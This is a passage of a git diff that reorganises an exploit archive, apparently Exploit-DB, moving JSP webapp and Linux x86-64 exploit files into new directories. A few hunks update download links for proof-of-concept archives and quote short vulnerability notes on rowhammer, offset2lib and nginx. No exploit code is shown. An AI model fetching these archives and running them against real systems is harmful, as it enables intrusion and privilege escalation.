a/platforms/jsp/webapps/33675.txt b/exploits/jsp/webapps/33675.txt similarity index 100% rename from platforms/jsp/webapps/33675.txt rename to exploits/jsp/webapps/33675.txt diff --git a/platforms/jsp/webapps/33678.txt b/exploits/jsp/webapps/33678.txt similarity index 100% rename from platforms/jsp/webapps/33678.txt rename to exploits/jsp/webapps/33678.txt diff --git a/platforms/jsp/webapps/33691.txt b/exploits/jsp/webapps/33691.txt similarity index 100% rename from platforms/jsp/webapps/33691.txt rename to exploits/jsp/webapps/33691.txt diff --git a/platforms/jsp/webapps/33779.txt b/exploits/jsp/webapps/33779.txt similarity index 100% rename from platforms/jsp/webapps/33779.txt rename to exploits/jsp/webapps/33779.txt diff --git a/platforms/jsp/webapps/33785.txt b/exploits/jsp/webapps/33785.txt similarity index 100% rename from platforms/jsp/webapps/33785.txt rename to exploits/jsp/webapps/33785.txt diff --git a/platforms/jsp/webapps/33942.txt b/exploits/jsp/webapps/33942.txt similarity index 100% rename from platforms/jsp/webapps/33942.txt rename to exploits/jsp/webapps/33942.txt diff --git a/platforms/jsp/webapps/34092.txt b/exploits/jsp/webapps/34092.txt similarity index 100% rename from platforms/jsp/webapps/34092.txt rename to exploits/jsp/webapps/34092.txt diff --git a/platforms/jsp/webapps/34179.txt b/exploits/jsp/webapps/34179.txt similarity index 100% rename from platforms/jsp/webapps/34179.txt rename to exploits/jsp/webapps/34179.txt diff --git a/platforms/jsp/webapps/34370.txt b/exploits/jsp/webapps/34370.txt similarity index 100% rename from platforms/jsp/webapps/34370.txt rename to exploits/jsp/webapps/34370.txt diff --git a/platforms/jsp/webapps/34384.txt b/exploits/jsp/webapps/34384.txt similarity index 100% rename from platforms/jsp/webapps/34384.txt rename to exploits/jsp/webapps/34384.txt diff --git a/platforms/jsp/webapps/34440.txt b/exploits/jsp/webapps/34440.txt similarity index 100% rename from platforms/jsp/webapps/34440.txt rename to exploits/jsp/webapps/34440.txt diff --git a/platforms/jsp/webapps/34518.txt b/exploits/jsp/webapps/34518.txt similarity index 100% rename from platforms/jsp/webapps/34518.txt rename to exploits/jsp/webapps/34518.txt diff --git a/platforms/jsp/webapps/34519.txt b/exploits/jsp/webapps/34519.txt similarity index 100% rename from platforms/jsp/webapps/34519.txt rename to exploits/jsp/webapps/34519.txt diff --git a/platforms/jsp/webapps/34834.txt b/exploits/jsp/webapps/34834.txt similarity index 100% rename from platforms/jsp/webapps/34834.txt rename to exploits/jsp/webapps/34834.txt diff --git a/platforms/jsp/webapps/34928.txt b/exploits/jsp/webapps/34928.txt similarity index 100% rename from platforms/jsp/webapps/34928.txt rename to exploits/jsp/webapps/34928.txt diff --git a/platforms/jsp/webapps/35079.txt b/exploits/jsp/webapps/35079.txt similarity index 100% rename from platforms/jsp/webapps/35079.txt rename to exploits/jsp/webapps/35079.txt diff --git a/platforms/jsp/webapps/35127.txt b/exploits/jsp/webapps/35127.txt similarity index 100% rename from platforms/jsp/webapps/35127.txt rename to exploits/jsp/webapps/35127.txt diff --git a/platforms/jsp/webapps/35169.txt b/exploits/jsp/webapps/35169.txt similarity index 100% rename from platforms/jsp/webapps/35169.txt rename to exploits/jsp/webapps/35169.txt diff --git a/platforms/jsp/webapps/35181.txt b/exploits/jsp/webapps/35181.txt similarity index 100% rename from platforms/jsp/webapps/35181.txt rename to exploits/jsp/webapps/35181.txt diff --git a/platforms/jsp/webapps/35209.txt b/exploits/jsp/webapps/35209.txt similarity index 100% rename from platforms/jsp/webapps/35209.txt rename to exploits/jsp/webapps/35209.txt diff --git a/platforms/jsp/webapps/35222.txt b/exploits/jsp/webapps/35222.txt similarity index 100% rename from platforms/jsp/webapps/35222.txt rename to exploits/jsp/webapps/35222.txt diff --git a/platforms/jsp/webapps/35594.txt b/exploits/jsp/webapps/35594.txt similarity index 100% rename from platforms/jsp/webapps/35594.txt rename to exploits/jsp/webapps/35594.txt diff --git a/platforms/jsp/webapps/35672.txt b/exploits/jsp/webapps/35672.txt similarity index 100% rename from platforms/jsp/webapps/35672.txt rename to exploits/jsp/webapps/35672.txt diff --git a/platforms/jsp/webapps/35706.txt b/exploits/jsp/webapps/35706.txt similarity index 100% rename from platforms/jsp/webapps/35706.txt rename to exploits/jsp/webapps/35706.txt diff --git a/platforms/jsp/webapps/35707.txt b/exploits/jsp/webapps/35707.txt similarity index 100% rename from platforms/jsp/webapps/35707.txt rename to exploits/jsp/webapps/35707.txt diff --git a/platforms/jsp/webapps/35890.txt b/exploits/jsp/webapps/35890.txt similarity index 100% rename from platforms/jsp/webapps/35890.txt rename to exploits/jsp/webapps/35890.txt diff --git a/platforms/jsp/webapps/35891.txt b/exploits/jsp/webapps/35891.txt similarity index 100% rename from platforms/jsp/webapps/35891.txt rename to exploits/jsp/webapps/35891.txt diff --git a/platforms/jsp/webapps/35904.txt b/exploits/jsp/webapps/35904.txt similarity index 100% rename from platforms/jsp/webapps/35904.txt rename to exploits/jsp/webapps/35904.txt diff --git a/platforms/jsp/webapps/35910.txt b/exploits/jsp/webapps/35910.txt similarity index 100% rename from platforms/jsp/webapps/35910.txt rename to exploits/jsp/webapps/35910.txt diff --git a/platforms/jsp/webapps/36002.txt b/exploits/jsp/webapps/36002.txt similarity index 100% rename from platforms/jsp/webapps/36002.txt rename to exploits/jsp/webapps/36002.txt diff --git a/platforms/jsp/webapps/36275.txt b/exploits/jsp/webapps/36275.txt similarity index 100% rename from platforms/jsp/webapps/36275.txt rename to exploits/jsp/webapps/36275.txt diff --git a/platforms/jsp/webapps/36353.txt b/exploits/jsp/webapps/36353.txt similarity index 100% rename from platforms/jsp/webapps/36353.txt rename to exploits/jsp/webapps/36353.txt diff --git a/platforms/jsp/webapps/36354.txt b/exploits/jsp/webapps/36354.txt similarity index 100% rename from platforms/jsp/webapps/36354.txt rename to exploits/jsp/webapps/36354.txt diff --git a/platforms/jsp/webapps/36355.txt b/exploits/jsp/webapps/36355.txt similarity index 100% rename from platforms/jsp/webapps/36355.txt rename to exploits/jsp/webapps/36355.txt diff --git a/platforms/jsp/webapps/36356.txt b/exploits/jsp/webapps/36356.txt similarity index 100% rename from platforms/jsp/webapps/36356.txt rename to exploits/jsp/webapps/36356.txt diff --git a/platforms/jsp/webapps/36357.txt b/exploits/jsp/webapps/36357.txt similarity index 100% rename from platforms/jsp/webapps/36357.txt rename to exploits/jsp/webapps/36357.txt diff --git a/platforms/jsp/webapps/36678.txt b/exploits/jsp/webapps/36678.txt similarity index 100% rename from platforms/jsp/webapps/36678.txt rename to exploits/jsp/webapps/36678.txt diff --git a/platforms/jsp/webapps/36929.txt b/exploits/jsp/webapps/36929.txt similarity index 100% rename from platforms/jsp/webapps/36929.txt rename to exploits/jsp/webapps/36929.txt diff --git a/platforms/jsp/webapps/37114.txt b/exploits/jsp/webapps/37114.txt similarity index 100% rename from platforms/jsp/webapps/37114.txt rename to exploits/jsp/webapps/37114.txt diff --git a/platforms/jsp/webapps/37152.txt b/exploits/jsp/webapps/37152.txt similarity index 100% rename from platforms/jsp/webapps/37152.txt rename to exploits/jsp/webapps/37152.txt diff --git a/platforms/jsp/webapps/37220.txt b/exploits/jsp/webapps/37220.txt similarity index 100% rename from platforms/jsp/webapps/37220.txt rename to exploits/jsp/webapps/37220.txt diff --git a/platforms/jsp/webapps/37221.txt b/exploits/jsp/webapps/37221.txt similarity index 100% rename from platforms/jsp/webapps/37221.txt rename to exploits/jsp/webapps/37221.txt diff --git a/platforms/jsp/webapps/37260.txt b/exploits/jsp/webapps/37260.txt similarity index 100% rename from platforms/jsp/webapps/37260.txt rename to exploits/jsp/webapps/37260.txt diff --git a/platforms/jsp/webapps/37272.txt b/exploits/jsp/webapps/37272.txt similarity index 100% rename from platforms/jsp/webapps/37272.txt rename to exploits/jsp/webapps/37272.txt diff --git a/platforms/jsp/webapps/37441.txt b/exploits/jsp/webapps/37441.txt similarity index 100% rename from platforms/jsp/webapps/37441.txt rename to exploits/jsp/webapps/37441.txt diff --git a/platforms/jsp/webapps/37467.txt b/exploits/jsp/webapps/37467.txt similarity index 100% rename from platforms/jsp/webapps/37467.txt rename to exploits/jsp/webapps/37467.txt diff --git a/platforms/jsp/webapps/37550.txt b/exploits/jsp/webapps/37550.txt similarity index 100% rename from platforms/jsp/webapps/37550.txt rename to exploits/jsp/webapps/37550.txt diff --git a/platforms/jsp/webapps/37802.html b/exploits/jsp/webapps/37802.html similarity index 100% rename from platforms/jsp/webapps/37802.html rename to exploits/jsp/webapps/37802.html diff --git a/platforms/jsp/webapps/38098.txt b/exploits/jsp/webapps/38098.txt similarity index 100% rename from platforms/jsp/webapps/38098.txt rename to exploits/jsp/webapps/38098.txt diff --git a/platforms/jsp/webapps/38188.txt b/exploits/jsp/webapps/38188.txt similarity index 100% rename from platforms/jsp/webapps/38188.txt rename to exploits/jsp/webapps/38188.txt diff --git a/platforms/jsp/webapps/38189.txt b/exploits/jsp/webapps/38189.txt similarity index 100% rename from platforms/jsp/webapps/38189.txt rename to exploits/jsp/webapps/38189.txt diff --git a/platforms/jsp/webapps/38190.txt b/exploits/jsp/webapps/38190.txt similarity index 100% rename from platforms/jsp/webapps/38190.txt rename to exploits/jsp/webapps/38190.txt diff --git a/platforms/jsp/webapps/38191.txt b/exploits/jsp/webapps/38191.txt similarity index 100% rename from platforms/jsp/webapps/38191.txt rename to exploits/jsp/webapps/38191.txt diff --git a/platforms/jsp/webapps/38192.txt b/exploits/jsp/webapps/38192.txt similarity index 100% rename from platforms/jsp/webapps/38192.txt rename to exploits/jsp/webapps/38192.txt diff --git a/platforms/jsp/webapps/38235.txt b/exploits/jsp/webapps/38235.txt similarity index 100% rename from platforms/jsp/webapps/38235.txt rename to exploits/jsp/webapps/38235.txt diff --git a/platforms/jsp/webapps/38334.txt b/exploits/jsp/webapps/38334.txt similarity index 100% rename from platforms/jsp/webapps/38334.txt rename to exploits/jsp/webapps/38334.txt diff --git a/platforms/jsp/webapps/38338.txt b/exploits/jsp/webapps/38338.txt similarity index 100% rename from platforms/jsp/webapps/38338.txt rename to exploits/jsp/webapps/38338.txt diff --git a/platforms/jsp/webapps/38395.txt b/exploits/jsp/webapps/38395.txt similarity index 100% rename from platforms/jsp/webapps/38395.txt rename to exploits/jsp/webapps/38395.txt diff --git a/platforms/jsp/webapps/38460.txt b/exploits/jsp/webapps/38460.txt similarity index 100% rename from platforms/jsp/webapps/38460.txt rename to exploits/jsp/webapps/38460.txt diff --git a/platforms/jsp/webapps/38645.txt b/exploits/jsp/webapps/38645.txt similarity index 100% rename from platforms/jsp/webapps/38645.txt rename to exploits/jsp/webapps/38645.txt diff --git a/platforms/jsp/webapps/38646.txt b/exploits/jsp/webapps/38646.txt similarity index 100% rename from platforms/jsp/webapps/38646.txt rename to exploits/jsp/webapps/38646.txt diff --git a/platforms/jsp/webapps/38816.html b/exploits/jsp/webapps/38816.html similarity index 100% rename from platforms/jsp/webapps/38816.html rename to exploits/jsp/webapps/38816.html diff --git a/platforms/jsp/webapps/39142.txt b/exploits/jsp/webapps/39142.txt similarity index 100% rename from platforms/jsp/webapps/39142.txt rename to exploits/jsp/webapps/39142.txt diff --git a/platforms/jsp/webapps/39143.txt b/exploits/jsp/webapps/39143.txt similarity index 100% rename from platforms/jsp/webapps/39143.txt rename to exploits/jsp/webapps/39143.txt diff --git a/platforms/jsp/webapps/39402.txt b/exploits/jsp/webapps/39402.txt similarity index 100% rename from platforms/jsp/webapps/39402.txt rename to exploits/jsp/webapps/39402.txt diff --git a/platforms/jsp/webapps/39405.py b/exploits/jsp/webapps/39405.py similarity index 100% rename from platforms/jsp/webapps/39405.py rename to exploits/jsp/webapps/39405.py diff --git a/platforms/jsp/webapps/39664.txt b/exploits/jsp/webapps/39664.txt similarity index 100% rename from platforms/jsp/webapps/39664.txt rename to exploits/jsp/webapps/39664.txt diff --git a/platforms/jsp/webapps/39667.txt b/exploits/jsp/webapps/39667.txt similarity index 100% rename from platforms/jsp/webapps/39667.txt rename to exploits/jsp/webapps/39667.txt diff --git a/platforms/jsp/webapps/39687.txt b/exploits/jsp/webapps/39687.txt similarity index 100% rename from platforms/jsp/webapps/39687.txt rename to exploits/jsp/webapps/39687.txt diff --git a/platforms/jsp/webapps/39691.py b/exploits/jsp/webapps/39691.py similarity index 100% rename from platforms/jsp/webapps/39691.py rename to exploits/jsp/webapps/39691.py diff --git a/platforms/jsp/webapps/39720.txt b/exploits/jsp/webapps/39720.txt similarity index 100% rename from platforms/jsp/webapps/39720.txt rename to exploits/jsp/webapps/39720.txt diff --git a/platforms/jsp/webapps/39780.txt b/exploits/jsp/webapps/39780.txt similarity index 100% rename from platforms/jsp/webapps/39780.txt rename to exploits/jsp/webapps/39780.txt diff --git a/platforms/jsp/webapps/39880.txt b/exploits/jsp/webapps/39880.txt similarity index 100% rename from platforms/jsp/webapps/39880.txt rename to exploits/jsp/webapps/39880.txt diff --git a/platforms/jsp/webapps/40050.txt b/exploits/jsp/webapps/40050.txt similarity index 100% rename from platforms/jsp/webapps/40050.txt rename to exploits/jsp/webapps/40050.txt diff --git a/platforms/jsp/webapps/40060.txt b/exploits/jsp/webapps/40060.txt similarity index 100% rename from platforms/jsp/webapps/40060.txt rename to exploits/jsp/webapps/40060.txt diff --git a/platforms/jsp/webapps/40065.txt b/exploits/jsp/webapps/40065.txt similarity index 100% rename from platforms/jsp/webapps/40065.txt rename to exploits/jsp/webapps/40065.txt diff --git a/platforms/jsp/webapps/40216.txt b/exploits/jsp/webapps/40216.txt similarity index 100% rename from platforms/jsp/webapps/40216.txt rename to exploits/jsp/webapps/40216.txt diff --git a/platforms/jsp/webapps/40229.txt b/exploits/jsp/webapps/40229.txt similarity index 100% rename from platforms/jsp/webapps/40229.txt rename to exploits/jsp/webapps/40229.txt diff --git a/platforms/jsp/webapps/40239.txt b/exploits/jsp/webapps/40239.txt similarity index 100% rename from platforms/jsp/webapps/40239.txt rename to exploits/jsp/webapps/40239.txt diff --git a/platforms/jsp/webapps/40240.txt b/exploits/jsp/webapps/40240.txt similarity index 100% rename from platforms/jsp/webapps/40240.txt rename to exploits/jsp/webapps/40240.txt diff --git a/platforms/jsp/webapps/40241.txt b/exploits/jsp/webapps/40241.txt similarity index 100% rename from platforms/jsp/webapps/40241.txt rename to exploits/jsp/webapps/40241.txt diff --git a/platforms/jsp/webapps/40242.txt b/exploits/jsp/webapps/40242.txt similarity index 100% rename from platforms/jsp/webapps/40242.txt rename to exploits/jsp/webapps/40242.txt diff --git a/platforms/jsp/webapps/40324.txt b/exploits/jsp/webapps/40324.txt similarity index 100% rename from platforms/jsp/webapps/40324.txt rename to exploits/jsp/webapps/40324.txt diff --git a/platforms/jsp/webapps/40325.html b/exploits/jsp/webapps/40325.html similarity index 100% rename from platforms/jsp/webapps/40325.html rename to exploits/jsp/webapps/40325.html diff --git a/platforms/jsp/webapps/40326.txt b/exploits/jsp/webapps/40326.txt similarity index 100% rename from platforms/jsp/webapps/40326.txt rename to exploits/jsp/webapps/40326.txt diff --git a/platforms/jsp/webapps/40327.txt b/exploits/jsp/webapps/40327.txt similarity index 100% rename from platforms/jsp/webapps/40327.txt rename to exploits/jsp/webapps/40327.txt diff --git a/platforms/jsp/webapps/40328.html b/exploits/jsp/webapps/40328.html similarity index 100% rename from platforms/jsp/webapps/40328.html rename to exploits/jsp/webapps/40328.html diff --git a/platforms/jsp/webapps/40989.txt b/exploits/jsp/webapps/40989.txt similarity index 100% rename from platforms/jsp/webapps/40989.txt rename to exploits/jsp/webapps/40989.txt diff --git a/platforms/jsp/webapps/41499.txt b/exploits/jsp/webapps/41499.txt similarity index 100% rename from platforms/jsp/webapps/41499.txt rename to exploits/jsp/webapps/41499.txt diff --git a/platforms/jsp/webapps/41577.txt b/exploits/jsp/webapps/41577.txt similarity index 100% rename from platforms/jsp/webapps/41577.txt rename to exploits/jsp/webapps/41577.txt diff --git a/platforms/jsp/webapps/41748.rb b/exploits/jsp/webapps/41748.rb similarity index 100% rename from platforms/jsp/webapps/41748.rb rename to exploits/jsp/webapps/41748.rb diff --git a/platforms/jsp/webapps/41926.txt b/exploits/jsp/webapps/41926.txt similarity index 100% rename from platforms/jsp/webapps/41926.txt rename to exploits/jsp/webapps/41926.txt diff --git a/platforms/jsp/webapps/42058.py b/exploits/jsp/webapps/42058.py similarity index 100% rename from platforms/jsp/webapps/42058.py rename to exploits/jsp/webapps/42058.py diff --git a/platforms/jsp/webapps/42340.txt b/exploits/jsp/webapps/42340.txt similarity index 100% rename from platforms/jsp/webapps/42340.txt rename to exploits/jsp/webapps/42340.txt diff --git a/platforms/jsp/webapps/42401.rb b/exploits/jsp/webapps/42401.rb similarity index 100% rename from platforms/jsp/webapps/42401.rb rename to exploits/jsp/webapps/42401.rb diff --git a/platforms/jsp/webapps/42402.rb b/exploits/jsp/webapps/42402.rb similarity index 100% rename from platforms/jsp/webapps/42402.rb rename to exploits/jsp/webapps/42402.rb diff --git a/platforms/jsp/webapps/42436.py b/exploits/jsp/webapps/42436.py similarity index 100% rename from platforms/jsp/webapps/42436.py rename to exploits/jsp/webapps/42436.py diff --git a/platforms/jsp/webapps/42437.html b/exploits/jsp/webapps/42437.html similarity index 100% rename from platforms/jsp/webapps/42437.html rename to exploits/jsp/webapps/42437.html diff --git a/platforms/jsp/webapps/42438.txt b/exploits/jsp/webapps/42438.txt similarity index 100% rename from platforms/jsp/webapps/42438.txt rename to exploits/jsp/webapps/42438.txt diff --git a/platforms/jsp/webapps/42439.txt b/exploits/jsp/webapps/42439.txt similarity index 100% rename from platforms/jsp/webapps/42439.txt rename to exploits/jsp/webapps/42439.txt diff --git a/platforms/jsp/webapps/42519.txt b/exploits/jsp/webapps/42519.txt similarity index 100% rename from platforms/jsp/webapps/42519.txt rename to exploits/jsp/webapps/42519.txt diff --git a/platforms/jsp/webapps/42939.txt b/exploits/jsp/webapps/42939.txt similarity index 100% rename from platforms/jsp/webapps/42939.txt rename to exploits/jsp/webapps/42939.txt diff --git a/platforms/jsp/webapps/42940.txt b/exploits/jsp/webapps/42940.txt similarity index 100% rename from platforms/jsp/webapps/42940.txt rename to exploits/jsp/webapps/42940.txt diff --git a/platforms/jsp/webapps/42966.py b/exploits/jsp/webapps/42966.py similarity index 100% rename from platforms/jsp/webapps/42966.py rename to exploits/jsp/webapps/42966.py diff --git a/platforms/jsp/webapps/5112.txt b/exploits/jsp/webapps/5112.txt similarity index 100% rename from platforms/jsp/webapps/5112.txt rename to exploits/jsp/webapps/5112.txt diff --git a/platforms/jsp/webapps/7075.txt b/exploits/jsp/webapps/7075.txt similarity index 100% rename from platforms/jsp/webapps/7075.txt rename to exploits/jsp/webapps/7075.txt diff --git a/platforms/jsp/webapps/9887.txt b/exploits/jsp/webapps/9887.txt similarity index 100% rename from platforms/jsp/webapps/9887.txt rename to exploits/jsp/webapps/9887.txt diff --git a/platforms/jsp/webapps/9958.txt b/exploits/jsp/webapps/9958.txt similarity index 100% rename from platforms/jsp/webapps/9958.txt rename to exploits/jsp/webapps/9958.txt diff --git a/platforms/lin_x86-64/dos/21224.c b/exploits/lin_x86-64/dos/21224.c similarity index 100% rename from platforms/lin_x86-64/dos/21224.c rename to exploits/lin_x86-64/dos/21224.c diff --git a/platforms/lin_x86-64/dos/33585.txt b/exploits/lin_x86-64/dos/33585.txt similarity index 90% rename from platforms/lin_x86-64/dos/33585.txt rename to exploits/lin_x86-64/dos/33585.txt index c0896b37b..9b7331116 100644 --- a/platforms/lin_x86-64/dos/33585.txt +++ b/exploits/lin_x86-64/dos/33585.txt @@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable. NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33585.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33585.tgz \ No newline at end of file diff --git a/platforms/lin_x86-64/dos/36266.c b/exploits/lin_x86-64/dos/36266.c similarity index 100% rename from platforms/lin_x86-64/dos/36266.c rename to exploits/lin_x86-64/dos/36266.c diff --git a/platforms/lin_x86-64/dos/37868.txt b/exploits/lin_x86-64/dos/37868.txt similarity index 94% rename from platforms/lin_x86-64/dos/37868.txt rename to exploits/lin_x86-64/dos/37868.txt index edd64f877..358149593 100644 --- a/platforms/lin_x86-64/dos/37868.txt +++ b/exploits/lin_x86-64/dos/37868.txt @@ -10,4 +10,4 @@ At first glance this might appear to be a NULL dereference but sometimes it cras The base sample from which the fuzz case is derived is also attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37868.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37868.zip \ No newline at end of file diff --git a/platforms/lin_x86-64/dos/37876.txt b/exploits/lin_x86-64/dos/37876.txt similarity index 94% rename from platforms/lin_x86-64/dos/37876.txt rename to exploits/lin_x86-64/dos/37876.txt index 4643b0715..3ee554890 100644 --- a/platforms/lin_x86-64/dos/37876.txt +++ b/exploits/lin_x86-64/dos/37876.txt @@ -36,4 +36,4 @@ function func(){ A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37876.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37876.zip \ No newline at end of file diff --git a/platforms/lin_x86-64/dos/37879.txt b/exploits/lin_x86-64/dos/37879.txt similarity index 94% rename from platforms/lin_x86-64/dos/37879.txt rename to exploits/lin_x86-64/dos/37879.txt index 2ea8b7d41..e4d6d0f19 100644 --- a/platforms/lin_x86-64/dos/37879.txt +++ b/exploits/lin_x86-64/dos/37879.txt @@ -20,4 +20,4 @@ This looks very like a heap-based buffer overflow that just happens to have walk Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37879.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37879.zip \ No newline at end of file diff --git a/platforms/lin_x86-64/dos/37880.txt b/exploits/lin_x86-64/dos/37880.txt similarity index 93% rename from platforms/lin_x86-64/dos/37880.txt rename to exploits/lin_x86-64/dos/37880.txt index c84228995..d6e8be33c 100644 --- a/platforms/lin_x86-64/dos/37880.txt +++ b/exploits/lin_x86-64/dos/37880.txt @@ -20,4 +20,4 @@ rdx 0x160b It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37880.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37880.zip \ No newline at end of file diff --git a/platforms/lin_x86-64/local/15023.c b/exploits/lin_x86-64/local/15023.c similarity index 100% rename from platforms/lin_x86-64/local/15023.c rename to exploits/lin_x86-64/local/15023.c diff --git a/platforms/lin_x86-64/local/15024.c b/exploits/lin_x86-64/local/15024.c similarity index 100% rename from platforms/lin_x86-64/local/15024.c rename to exploits/lin_x86-64/local/15024.c diff --git a/platforms/lin_x86-64/local/24555.c b/exploits/lin_x86-64/local/24555.c similarity index 100% rename from platforms/lin_x86-64/local/24555.c rename to exploits/lin_x86-64/local/24555.c diff --git a/platforms/lin_x86-64/local/24746.c b/exploits/lin_x86-64/local/24746.c similarity index 100% rename from platforms/lin_x86-64/local/24746.c rename to exploits/lin_x86-64/local/24746.c diff --git a/platforms/lin_x86-64/local/26131.c b/exploits/lin_x86-64/local/26131.c similarity index 100% rename from platforms/lin_x86-64/local/26131.c rename to exploits/lin_x86-64/local/26131.c diff --git a/platforms/lin_x86-64/local/31347.c b/exploits/lin_x86-64/local/31347.c similarity index 100% rename from platforms/lin_x86-64/local/31347.c rename to exploits/lin_x86-64/local/31347.c diff --git a/platforms/lin_x86-64/local/32751.c b/exploits/lin_x86-64/local/32751.c similarity index 100% rename from platforms/lin_x86-64/local/32751.c rename to exploits/lin_x86-64/local/32751.c diff --git a/platforms/lin_x86-64/local/33516.c b/exploits/lin_x86-64/local/33516.c similarity index 100% rename from platforms/lin_x86-64/local/33516.c rename to exploits/lin_x86-64/local/33516.c diff --git a/platforms/lin_x86-64/local/33589.c b/exploits/lin_x86-64/local/33589.c similarity index 100% rename from platforms/lin_x86-64/local/33589.c rename to exploits/lin_x86-64/local/33589.c diff --git a/platforms/lin_x86-64/local/34134.c b/exploits/lin_x86-64/local/34134.c similarity index 100% rename from platforms/lin_x86-64/local/34134.c rename to exploits/lin_x86-64/local/34134.c diff --git a/platforms/lin_x86-64/local/35472.txt b/exploits/lin_x86-64/local/35472.txt similarity index 96% rename from platforms/lin_x86-64/local/35472.txt rename to exploits/lin_x86-64/local/35472.txt index a8d4a5dc6..07a3423b7 100644 --- a/platforms/lin_x86-64/local/35472.txt +++ b/exploits/lin_x86-64/local/35472.txt @@ -43,7 +43,7 @@ by knowing only an address belonging to the application and the offset2lib value +------------------+ The proof of concept exploit code is available here: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35472.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35472.tgz http://packetstormsecurity.com/files/129398 +------------------------------------------------------------------------------+ diff --git a/platforms/lin_x86-64/local/36310.txt b/exploits/lin_x86-64/local/36310.txt similarity index 92% rename from platforms/lin_x86-64/local/36310.txt rename to exploits/lin_x86-64/local/36310.txt index 44625b348..b7424e4be 100644 --- a/platforms/lin_x86-64/local/36310.txt +++ b/exploits/lin_x86-64/local/36310.txt @@ -2,7 +2,7 @@ Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=283 -Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36310.tar.gz +Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36310.tar.gz This is a proof-of-concept exploit that is able to gain kernel privileges on machines that are susceptible to the DRAM "rowhammer" diff --git a/platforms/lin_x86-64/local/36311.txt b/exploits/lin_x86-64/local/36311.txt similarity index 94% rename from platforms/lin_x86-64/local/36311.txt rename to exploits/lin_x86-64/local/36311.txt index ef794a88c..72d1a95de 100644 --- a/platforms/lin_x86-64/local/36311.txt +++ b/exploits/lin_x86-64/local/36311.txt @@ -2,7 +2,7 @@ Sources: http://googleprojectzero.blogspot.ca/2015/03/exploiting-dram-rowhammer-bug-to-gain.html https://code.google.com/p/google-security-research/issues/detail?id=284 -Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36311.tar.gz +Full PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36311.tar.gz This is a proof-of-concept exploit that is able to escape from Native diff --git a/platforms/lin_x86-64/local/37722.c b/exploits/lin_x86-64/local/37722.c similarity index 100% rename from platforms/lin_x86-64/local/37722.c rename to exploits/lin_x86-64/local/37722.c diff --git a/platforms/lin_x86-64/local/40049.c b/exploits/lin_x86-64/local/40049.c similarity index 94% rename from platforms/lin_x86-64/local/40049.c rename to exploits/lin_x86-64/local/40049.c index 714ab0128..76850cff5 100644 --- a/platforms/lin_x86-64/local/40049.c +++ b/exploits/lin_x86-64/local/40049.c @@ -1,5 +1,5 @@ /* -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip */ --------------------------------------------------- decr.c --------------------------------------------------- diff --git a/platforms/lin_x86-64/local/40811.c b/exploits/lin_x86-64/local/40811.c similarity index 100% rename from platforms/lin_x86-64/local/40811.c rename to exploits/lin_x86-64/local/40811.c diff --git a/platforms/lin_x86-64/local/40871.c b/exploits/lin_x86-64/local/40871.c similarity index 100% rename from platforms/lin_x86-64/local/40871.c rename to exploits/lin_x86-64/local/40871.c diff --git a/platforms/lin_x86-64/local/42275.c b/exploits/lin_x86-64/local/42275.c similarity index 100% rename from platforms/lin_x86-64/local/42275.c rename to exploits/lin_x86-64/local/42275.c diff --git a/platforms/lin_x86-64/local/4460.c b/exploits/lin_x86-64/local/4460.c similarity index 100% rename from platforms/lin_x86-64/local/4460.c rename to exploits/lin_x86-64/local/4460.c diff --git a/platforms/lin_x86-64/local/9083.c b/exploits/lin_x86-64/local/9083.c similarity index 100% rename from platforms/lin_x86-64/local/9083.c rename to exploits/lin_x86-64/local/9083.c diff --git a/platforms/lin_x86-64/remote/32277.txt b/exploits/lin_x86-64/remote/32277.txt similarity index 88% rename from platforms/lin_x86-64/remote/32277.txt rename to exploits/lin_x86-64/remote/32277.txt index 821194f54..3d6179dab 100644 --- a/platforms/lin_x86-64/remote/32277.txt +++ b/exploits/lin_x86-64/remote/32277.txt @@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32277.tgz \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32277.tgz \ No newline at end of file diff --git a/platforms/lin_x86-64/remote/42964.rb b/exploits/lin_x86-64/remote/42964.rb similarity index 100% rename from platforms/lin_x86-64/remote/42964.rb rename to exploits/lin_x86-64/remote/42964.rb diff --git a/platforms/lin_x86/dos/36741.py b/exploits/lin_x86/dos/36741.py similarity index 100% rename from platforms/lin_x86/dos/36741.py rename to exploits/lin_x86/dos/36741.py diff --git 